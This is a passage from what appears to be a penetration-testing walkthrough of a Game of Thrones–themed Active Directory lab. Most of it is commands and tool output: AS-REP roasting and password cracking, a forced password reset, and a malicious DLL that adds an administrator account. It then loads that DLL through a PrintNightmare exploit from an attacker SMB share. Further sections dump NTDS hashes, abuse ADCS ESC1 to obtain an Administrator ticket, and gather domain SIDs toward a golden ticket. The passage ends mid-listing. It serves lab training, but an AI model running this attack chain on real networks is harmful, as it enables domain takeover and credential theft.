NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_c9464f19.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_63039232.kirbi) [+] 192.168.56.22 NORTH.SEVENKINGDOMS.LOCAL\CASTELBLACK$ [TGT] Domain: NORTH.SEVENKINGDOMS.LOCAL - End time: 2024-10-13 12:15 (TGT_NORTH.SEVENKINGDOMS.LOCAL_CASTELBLACK$_krbtgt_NORTH.SEVENKINGDOMS.LOCAL_dd82f6bc.kirbi) [+] 192.168.56.22 18 Kerberos tickets written to /home/kali/.config/lsassy/tickets [+] 192.168.56.22 5 masterkeys saved to /home/kali/.config/lsassy/masterkeys.txt
You have full Administrator privileges for winterfell.
Meereen Walkthrough
I looked at users who have ASREPRoast enabled on bloodhound and found ESOSS.LOCAL/MISSANDEI.
Let’s try running ASREPRoast.
┌──(kali㉿kali)-[~] └─$ nxc ldap 192.168.56.23 -u missandei -p '' --asreproast asreproast.hash SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) LDAP 192.168.56.23 445 BRAAVOS $krb5asrep$23$missandei@ESSOS.LOCAL:dcdfca025e409115dac3015ad2bdad49$8d5164d380201364641c6765135d0f1f396f15de39d107f3a23685f1b6aaacd52 c765146c336f31d9e33d59d614cfc1c05e0bc2bd414dcdee30acf84fef1d469d411 ecadb1ef16ba740692505fb983c5d335bd8d3c120f28f3476ef566a517629863f24 e68cd0d56ce56bd0b617b1bacaeb375d4b06a726809f6fef115cf8eecd0337611e4 259618593628c5058b5d86e9b994b555340086d4f72c57f9954dfd159e8e071d415 b2e8b9e85a3990e300b7253d3f0673c2e317f549dada4fc4b80c6f298f9bc296f1 fb077ddcf7aa31e9592b98bd7f11c572d0132b4fc8b38ce5543ba9415b28bc163e42
I’ll call john.
┌──(kali㉿kali)-[~/goad/braavos] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status fr3edom ($krb5asrep$23$missandei@ESSOS.LOCAL) 1g 0:00:00:01 DONE (2024-10-19 16:58) 0.8333g/s 1496Kp/s 1496Kc/s 1496KC/s franciene..found9tion Use the "--show" option to display all of the cracked passwords reliably Session completed.
missandei/fr3edomI got the authentication information.
In bloodhound, missandei has GenericAll permissions for the user khal.drago.
So change the password for khal.drogo.
The tool we will use is ldap_shell .
┌──(kali㉿kali)-[~/goad/braavos] └─$ ldap_shell essos.local/missandei -dc-host essos.local Password: [INFO] Starting interactive shellandei # miss missandei# change_password khal.drogo horse [INFO] Got User DN: CN=khal.drogo,CN=Users,DC=essos,DC=local [INFO] Attempting to set new password of: horse [INFO] Password changed successfully!
So khal.drogo/horsewe get the credentials to rewrite the password.
If you try checking, you will see that the authentication information has been properly obtained.
┌──(kali㉿kali)-[~/goad/braavos] └─$ nxc smb braavos -u khal.drogo -p horse SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.23 445 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)
It looks like winrm is also authenticated.
┌──(kali㉿kali)-[~/goad/braavos] └─$ nxc winrm braavos -u khal.drogo -p horse WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) WINRM 192.168.56.23 5985 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)
For now, evil-winrm has given us a foothold.
┌──(kali㉿kali)-[~/goad/braavos] └─$ evil-winrm -u khal.drogo -p horse -i braavos Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\khal.drogo\Documents>
We will investigate whether Printnightmare can be used to escalate privileges.
#include <windows.h> int RunCMD() { system("net users pnightmare Passw0rd123. /add"); system("net localgroup administrators pnightmare /add"); return 0; } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: RunCMD(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
This is the code that creates and adds a user called pnightmare to the administrators group when the DLL is attached to a process.
compile
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
Clone the code from PrintNightmare.
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
Publish the DLL via SMB.
smbserver.py -smb2support ATTACKERSHARE .
And then run Printnightmare.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] └─$ python3 CVE-2021-1675.py essos.local/khal.drogo:horse@meereen.essos.local '\\192.168.56.104\ATTACKSHARE\nightmare.dll' [*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL [*] Executing \??\UNC\192.168.56.104\ATTACKSHARE\nightmare.dll [*] Try 1... [*] Stage0: 0 [*] Try 2... [*] Stage0: 0 [*] Stage2: 0 [+] Exploit Completed
pnightmare/Passw0rd123.I got it.
You can see that this can be done by infiltrating with evil-winrm.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] └─$ evil-winrm -u pnightmare -p Passw0rd123. -i meereen Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\pnightmare\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================== ========================================================================== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled *Evil-WinRM* PS C:\Users\pnightmare\Documents>
So we have the NTLM hash.
┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] └─$ nxc smb meereen.essos.local -u pnightmare -p Passw0rd123. --ntds [!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) SMB 192.168.56.12 445 MEEREEN [+] essos.local\pnightmare:Passw0rd123. (Pwn3d!) SMB 192.168.56.12 445 MEEREEN [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 192.168.56.12 445 MEEREEN Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da::: SMB 192.168.56.12 445 MEEEREEN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.56.12 445 MEEEREEN krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54798535f08dafb2f3ab805bb312961d::: SMB 192.168.56.12 445 MEEREEN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.56.12 445 MEEREEN vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: SMB 192.168.56.12 445 MEEREEN daenerys.targaryen:1112:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a::: SMB 192.168.56.12 445 MEEREEN viserys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097::: SMB 192.168.56.12 445 MEEREEN khal.drogo:1114:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021::: SMB 192.168.56.12 445 MEEREEN jorah.mormont:1115:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611::: SMB 192.168.56.12 445 MEEREEN missandei:1116:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec::: SMB 192.168.56.12 445 MEEREEN drogon:1117:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6::: SMB 192.168.56.12 445 MEEREEN sql_svc:1118:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: SMB 192.168.56.12 445 MEEREEN pnightmare:1121:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e::: SMB 192.168.56.12 445 MEEREEN MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:f05997d79fa50e0346a4d593d8eb1741::: SMB 192.168.56.12 445 MEEREEN BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:0d8d114e49ff85a35b3c97208d88dcf3::: SMB 192.168.56.12 445 MEEREEN gmsaDragon$:1119:aad3b435b51404eeaad3b435b51404ee:563b455a419089dfbfa829cab9f2b174::: SMB 192.168.56.12 445 MEEREEN removemiccomputer$:1120:aad3b435b51404eeaad3b435b51404ee:1e986d18a9b7c9543e2d57944e8656b7::: SMB 192.168.56.12 445 MEEREEN SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:743ab45cdf64d2f368f501fd348ab3d8::: SMB 192.168.56.12 445 MEEREEN [+] Dumped 18 NTDS hashes to /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds of which 13 were added to the database SMB 192.168.56.12 445 MEEREEN [*] To extract only enabled accounts from the output file, run the following command: SMB 192.168.56.12 445 MEEREEN [*] cat /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | grep -iv disabled | cut -d ':' -f1 SMB 192.168.56.12 445 MEEREEN [*] grep -iv disabled /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | cut -d ':' -f1
Braavos Strategy
Braavos, under Meereen’s command, is an ADCS. I’d like to attack the ADCS area as well.
Spectorops’s document provides detailed information on ADCS attacks.
https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
Let’s try to get the contents of ADCS.
┌──(kali㉿kali)-[~/goad/braavos] └─$ certipy-ad find -u 'khal.drogo' -p horse -dc-ip 192.168.56.12 -vulnerable -enabled Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 38 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 16 enabled certificate templates [*] Trying to get CA configuration for 'ESSOS-CA' via CSRA [*] Got CA configuration for 'ESSOS-CA' [*] Saved BloodHound data to '20241023161533_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k [*] Saved text output to '20241023161533_Certipy.txt' [*] Saved JSON output to '20241023161533_Certipy.json' ┌──(kali㉿kali)-[~/goad/braavos] └─$ cat 20241023161533_Certipy.txt Certificate Authorities 0 CA Name: ESSOS-CA DNS Name: braavos.essos.local Certificate Subject: CN=ESSOS-CA, DC=essos, DC=local Certificate Serial Number: 5120F6B8733E26BC43F390382A65D06B Certificate Validity Start: 2024-08-11 03:37:50+00:00 Certificate Validity End: 2029-08-11 03:47:49+00:00 Web Enrollment : Enabled User Specified SAN : Enabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : ESSOS.LOCAL\Administrators Access Rights ManageCertificates : ESSOS.LOCAL\Administrators ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Enterprise Admins ManageCa : ESSOS.LOCAL\Administrators ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Enterprise Admins Enroll : ESSOS.LOCAL\Authenticated Users [!] Vulnerabilities ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022 ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue Certificate Templates 0 Template Name : ESC4 Display Name : ESC4 Certificate Authorities : ESSOS-CA Enabled : True Client Authentication : False Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectRequireDirectoryPath SubjectRequireEmail SubjectAltRequireUpn Enrollment Flag : AutoEnrollment PublishToDs PendAllRequests IncludeSymmetricAlgorithms Private Key Flag : ExportableKey Extended Key Usage : Code Signing Requires Manager Approval : True Requires Key Archival : False Authorized Signatures Required : 1 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : ESSOS.LOCAL\Domain Users Object Control Permissions Owner : ESSOS.LOCAL\Enterprise Admins Full Control Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\khal.drogo ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Owner Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\khal.drogo ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Dacl Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\khal.drogo ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Property Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\khal.drogo ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins [!] Vulnerabilities ESC4 : 'ESSOS.LOCAL\\khal.drogo' has dangerous permissions 1 Template Name : ESC3-CRA Display Name : ESC3-CRA Certificate Authorities : ESSOS-CA Enabled : True Client Authentication : False Enrollment Agent : True Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectAltRequireUpn Enrollment Flag : AutoEnrollment Private Key Flag : 16842752 Extended Key Usage : Certificate Request Agent Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : ESSOS.LOCAL\Domain Users Object Control Permissions Owner : ESSOS.LOCAL\Enterprise Admins Full Control Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Owner Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Dacl Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Property Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins [!] Vulnerabilities ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 2 Template Name : ESC2 Display Name : ESC2 Certificate Authorities : ESSOS-CA Enabled : True Client Authentication : True Enrollment Agent : True Any Purpose : True Enrollee Supplies Subject : False Certificate Name Flag : SubjectAltRequireUpn Enrollment Flag : AutoEnrollment Private Key Flag : 16842752 Extended Key Usage : Any Purpose Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : ESSOS.LOCAL\Domain Users Object Control Permissions Owner : ESSOS.LOCAL\Enterprise Admins Full Control Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Owner Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Dacl Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Property Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins [!] Vulnerabilities ESC2 : 'ESSOS.LOCAL\\Domain Users' can enroll and template can be used for any purpose ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 3 Template Name : ESC1 Display Name : ESC1 Certificate Authorities : ESSOS-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : 16842752 Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : ESSOS.LOCAL\Domain Users Object Control Permissions Owner : ESSOS.LOCAL\Enterprise Admins Full Control Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Owner Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Dacl Principals: ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins Write Property Principals : ESSOS.LOCAL\Domain Admins ESSOS.LOCAL\Local System ESSOS.LOCAL\Enterprise Admins [!] Vulnerabilities ESC1 : 'ESSOS.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
A variety of vulnerable content was displayed.
This time I’ll try attacking with ESC1.
┌──(kali㉿kali)-[~/goad/braavos] └─$ certipy-ad req -u 'khal.drogo@essos.local' -p 'horse' -dc-ip 192.168.56.12 -target 192.168.56.23 -ca 'ESSOS-CA' -template ESC1 -upn 'administrator@essos.local' Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 9 [*] Got certificate with UPN 'administrator@essos.local' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx' ┌──(kali㉿kali)-[~/goad/braavos] └─$ certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12 Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@essos.local [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@essos.local': aad3b435b51404eeaad3b435b51404ee:217e50203a5aba59cefa863c724bf61b ┌──(kali㉿kali)-[~/goad/braavos] └─$ ls 20241023161533_Certipy.json 20241023161533_Certipy.txt 20241023161533_Certipy.zip administrator.ccache administrator.pfx asreproast.hash braavos.nmap missandei.ccache
I was able to get a TGT for Administrator.
Can do anything an Administrator TGT can do.
Sevenkingdoms walkthrough
Exploit the top-level parent domain SEVENKINGDOMS.
I’ll try making a golden key myself.
First, get the NTLM hash of krbtgt for north.sevenkingdoms.local:
┌──(kali㉿kali)-[~/goad/winterfell] └─$ nxc smb north.sevenkingdoms.local -u Administrator -H aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 --ntds [!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9cd8721de5b33c59702a9f64787f1ea3::: SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d::: SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:77681f192335d80e476b29aabe77c9bf::: SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67::: SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:f85ab966533246d54fc98f68f6741dd8::: SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds of which 16 were added to the database SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command: SMB grep -iv disabled | cut -d ':' -f1 SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds | cut -d ':' -f1
Got the hash for krbtgt.
Next, let’s get the Domain SID.
First192.168.56.11
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.11 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Brute forcing SIDs at 192.168.56.11 [*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-2343606889-1312097775-3500245986 500: NORTH\Administrator (SidTypeUser) 501: NORTH\Guest (SidTypeUser) 502: NORTH\krbtgt (SidTypeUser) 512: NORTH\Domain Admins (SidTypeGroup) 513: NORTH\Domain Users (SidTypeGroup) 514: NORTH\Domain Guests (SidTypeGroup) 515: NORTH\Domain Computers (SidTypeGroup) 516: NORTH\Domain Controllers (SidTypeGroup) 517: NORTH\Cert Publishers (SidTypeAlias) 520: NORTH\Group Policy Creator Owners (SidTypeGroup) 521: NORTH\Read-only Domain Controllers (SidTypeGroup) 522: NORTH\Cloneable Domain Controllers (SidTypeGroup) 525: NORTH\Protected Users (SidTypeGroup) 526: NORTH\Key Admins (SidTypeGroup) 553: NORTH\RAS and IAS Servers (SidTypeAlias) 571: NORTH\Allowed RODC Password Replication Group (SidTypeAlias) 572: NORTH\Denied RODC Password Replication Group (SidTypeAlias) 1000: NORTH\vagrant (SidTypeUser) 1001: NORTH\WINTERFELL$ (SidTypeUser) 1102: NORTH\DnsAdmins (SidTypeAlias) 1103: NORTH\DnsUpdateProxy (SidTypeGroup) 1104: NORTH\SEVENKINGDOMS$ (SidTypeUser) 1105: NORTH\CASTELBLACK$ (SidTypeUser) 1106: NORTH\Stark (SidTypeGroup) 1107: NORTH\Night Watch (SidTypeGroup) 1108: NORTH\Mormont (SidTypeGroup) 1109: NORTH\AcrossTheSea (SidTypeAlias) 1110: NORTH\arya.stark (SidTypeUser) 1111: NORTH\eddard.stark (SidTypeUser) 1112: NORTH\catelyn.stark (SidTypeUser) 1113: NORTH\robb.stark (SidTypeUser) 1114: NORTH\sansa.stark (SidTypeUser) 1115: NORTH\brandon.stark (SidTypeUser) 1116: NORTH\rickon.stark (SidTypeUser) 1117: NORTH\hodor (SidTypeUser) 1118: NORTH\jon.snow (SidTypeUser) 1119: NORTH\samwell.tarly (SidTypeUser) 1120: NORTH\jeor.mormont (SidTypeUser) 1121: NORTH\sql_svc (SidTypeUser)
Next, 192.168.56.10
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.10 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Brute forcing SIDs at 192.168.56.10 [*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-2095540843-66383145-2975355457 498: SEVENKINGDOMS\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: SEVENKINGDOMS\Administrator (SidTypeUser) 501: SEVENKINGDOMS\Guest (SidTypeUser) 502: SEVENKINGDOMS\krbtgt (SidTypeUser) 512: SEVENKINGDOMS\Domain Admins (SidTypeGroup) 513: SEVENKINGDOMS\Domain Users (SidTypeGroup) 514: SEVENKINGDOMS\Domain Guests (SidTypeGroup) 515: SEVENKINGDOMS\Domain Computers (SidTypeGroup) 516: SEVENKINGDOMS\Domain Controllers (SidTypeGroup) 517: SEVENKINGDOMS\Cert Publishers (SidTypeAlias) 518: SEVENKINGDOMS\Schema Admins (SidTypeGroup) 519: SEVENKINGDOMS\Enterprise Admins (SidTypeGroup) 520: SEVENKINGDOMS\Group Policy Creator Owners (SidTypeGroup) 521: SEVENKINGDOMS\Read-only Domain Controllers (SidTypeGroup) 522: SEVENKINGDOMS\Cloneable Domain Controllers (SidTypeGroup) 525: SEVENKINGDOMS\Protected Users (SidTypeGroup) 526: SEVENKINGDOMS\Key Admins (SidTypeGroup) 527: SEVENKINGDOMS\Enterprise Key Admins (SidTypeGroup) 553: SEVENKINGDOMS\RAS and IAS Servers (SidTypeAlias) 571: SEVENKINGDOMS\Allowed RODC Password Replication Group (SidTypeAlias) 572: SEVENKINGDOMS\Denied RODC Password Replication Group (SidTypeAlias) 1000: SEVENKINGDOMS\vagrant (SidTypeUser) 1001: SEVENKINGDOMS\KINGSLANDING$ (SidTypeUser) 1102: SEVENKINGDOMS\DnsAdmins (SidTypeAlias) 1103: SEVENKINGDOMS\DnsUpdateProxy (SidTypeGroup) 1104: SEVENKINGDOMS\NORTH$ (SidTypeUser) 1105: SEVENKINGDOMS\ESSOS$ (SidTypeUser) 1106: SEVENKINGDOMS\Lannister (SidTypeGroup) 1107: SEVENKINGDOMS\Baratheon (SidTypeGroup) 1108: SEVENKINGDOMS\Small Council (SidTypeGroup) 1109: SEVENKINGDOMS\DragonStone (SidTypeGroup) 1110: SEVENKINGDOMS\KingsGuard (SidTypeGroup) 1111: SEVENKINGDOMS\DragonRider (SidTypeGroup) 1112: SEVENKINGDOMS\AcrossTheNarrowSea (SidTypeAlias) 1113: 